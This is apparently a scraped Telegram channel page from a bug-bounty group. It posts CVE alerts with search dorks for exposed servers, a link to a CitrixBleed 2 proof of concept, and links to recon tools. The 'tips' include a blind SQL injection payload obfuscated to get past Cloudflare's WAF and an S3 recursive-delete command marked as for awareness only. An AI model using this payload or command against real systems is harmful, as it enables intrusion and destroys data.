Brut Security
14.7K subscribers
919 photos
73 videos
287 files
974 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
🎯wtfis - Passive hostname, domain and IP lookup tool for non-robots

βœ…https://github.com/pirxthepilot/wtfis
❀8
CVE-2025-48367: DoS in Redis, 7.0 rating❗️

One of two recent vulnerabilities discovered in Redis. Allows an attacker to perform a DoS, while the other allows an attacker to write out of bounds on hyperloglog operations, potentially leading to remote code execution.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/Lve8A
πŸ‘‰ Dork: redis:*

Vendor's advisory: https://github.com/redis/redis/security/advisories/GHSA-2r7g-8hpc-rpq9
πŸ”₯8🀝1
lock in & build your dream.
❀25πŸ‘7πŸ—Ώ7
🎯 TryHackMe Voucher Giveaway at 1000 Members! 🎯

We’re on the road to 1,000 members in our Discord community! πŸš€
Currently at 700+ strong, and once we hit 1K, we’ll be giving away a TryHackMe Voucher to Three lucky member! πŸ”πŸ’»

🟒 What You Need to Do:
Join the Discord: https://discord.gg/u7uMFV833h
Stay active, invite your friends
Once we reach 1,000 members, the giveaway will go live!

πŸ“’ Let’s grow this amazing community together – learning, hacking, and winning! πŸ’₯
πŸ”₯3❀2
CVE-2025-42963: Deserialization of Untrusted Data in SAP NetWeaver Application server for Java, 9.1 rating πŸ”₯

A vulnerability in the LogViewer component allows an authenticated attacker to exploit unsafe Java object deserialization, which could lead to complete control over the system.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/0c6Ud
πŸ‘‰ Dork: http.headers.server:"NetWeaver"

Vendor's advisory: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/july-2025.html
πŸ”₯5
▢️ It's LIVE!

πŸ“ŒSubWatch – your next favorite tool for automated VPS subdomain monitoring! πŸ”

βœ… Supported On VPS
βœ… Runs every 6 hours
βœ… Sends newly found subdomains directly to your Discord
βœ… Includes .txt file + message alerts
βœ… Perfect for bug bounty hunters & recon workflows

πŸ“½οΈ Watch the YouTube video & get started now:
πŸ‘‰
https://youtu.be/BkpSQKSTFUI

πŸ“₯ Download & Readme on GitHub:
πŸ‘‰
https://github.com/Brut-Security/SubWatch

πŸ”§ Powered by: subfinder, anew, jq, notify
Built with πŸ’™ by Brut Security

❀️ Give it a try, share it with your team, and drop your reactions below!
❀15
🚨CVE-2025-5777 (CitrixBleed 2) - Critical memory leak vulnerability affecting Citrix NetScaler ADC and Gateway devices

🎯Severity: CRITICAL ⚠️

βœ…PoC: https://github.com/win3zz/CVE-2025-5777
❀3πŸ”₯3
CVE-2025-49704: Code Injection in Microsoft SharePoint, 8.8 rating❗️

The vulnerability allows an authenticated attacker to execute code over the network.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/1egrVπŸ‘‰ Dork: http.headers.microsoftsharepointteamservices:*
Vendor's advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49704
❀4
🚨 Bug Bounty Tip: Takeover Vulnerable S3 Buckets in Under a Minute! ☁️

Want to identify exposed Amazon S3 buckets linked to a target? Here's a quick method:
echo REDACTED.COM | cariddi | grep js | tee js_files | httpx -mc 200 | nuclei -tags aws,amazon

πŸ” Then check for public S3 buckets:
aws s3 ls s3://REDACTEDCOM.s3.amazonaws.com


πŸ‘‰ If the bucket name isn’t obvious:
echo REDACTED.COM | cariddi -e -s -info

⚠️ Found a vulnerable bucket? Don’t delete anything!
# Do NOT run this. Just for awareness:
aws s3 rm s3://REDACTEDCOM.s3.amazonaws.com --recursive



βœ… Always report responsibly. Never exploit β€” you're here to help, not harm.

⚑️ Happy Hunting!
❀11πŸ‘7πŸ”₯4πŸ—Ώ2
πŸ›‘οΈ Bug Bounty Tip: Cloudflare 403 Bypass for Time-Based Blind SQLi

When your payload gets blocked by Cloudflare (403), try obfuscation with URL encoding to sneak it past!

❌ Blocked Payload
(select(0)from(select(sleep(10)))v) β†’ 403 Forbidden

βœ… Bypass Payload

(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C"%2B(select(0)from(select(sleep(6)))v)



πŸ” This obfuscation can help trigger Time-Based Blind SQLi even when WAF protection is in place.

βœ…Credit: @nav1n0x
❀35πŸ‘5πŸ—Ώ4😁1
Top 25 Recon Tools and their PurposesπŸ“
❀23πŸ‘3
To all my dear students and subscribers,
On this special occasion of Guru Purnima, remember:

🧠 β€œYour knowledge is your antivirus. Your guru is your source code.”

Stay curious, stay humble, and always keep learning.
– With gratitude,
Brut Security
1❀29πŸ‘7🀨2πŸ‘1
❀10
⚑SSTImap - Automatic SSTI detection tool with interactive interface

βœ…
https://github.com/vladko312/SSTImap
❀11πŸ‘3
Tired of switching tabs for OSINT and recon? Just join our Discord and type sudo help to unlock powerful tools in seconds!

βœ… IP & Domain Lookup
βœ… Email & Phone OSINT
βœ… Subdomain Enumeration
βœ… Reverse Image Search
βœ… URL & Virus Scanners
βœ… Temp Email, QR Tools, and more

🌟 You can create and play your own CTF in a minute , right inside Discord!

Try it out now β€” it’s fast, simple, and all in one chat.
πŸ”— https://discord.gg/u7uMFV833h

#ctf #bugbounty #osint #cybersecurity #discordtools #infosec
1🫑8❀4
🚨A comprehensive bug bounty methodology compiled from extensive research, covering web application reconnaissance, checklists, and methods for identifying various bugs. This guide aims to help bug hunters improve their skills in finding, verifying, and responsibly reporting security vulnerabilities.


βœ… Download:
https://github.com/alihussainzada/BugHunterMethodology/
❀11πŸ‘4
⚑CloakQuest3r - Uncover the true IP address of websites safeguarded by Cloudflare & Others

βœ…
https://github.com/spyboy-productions/CloakQuest3r
❀22
This media is not supported in your browser
VIEW IN TELEGRAM
⚑Scanning github repos is a great way to find juicy information, secrets and credentials!

Trufflehog makes this easy.

With one scan you can find AWS keys, FTP creds, crypto keys and more!

βœ…Check this out - https://github.com/trufflesecurity/trufflehog
❀24πŸ”₯7πŸ‘2
dON'T fORGET tO gIVE rEACTIONS
❀25πŸ”₯4🫑2πŸ€”1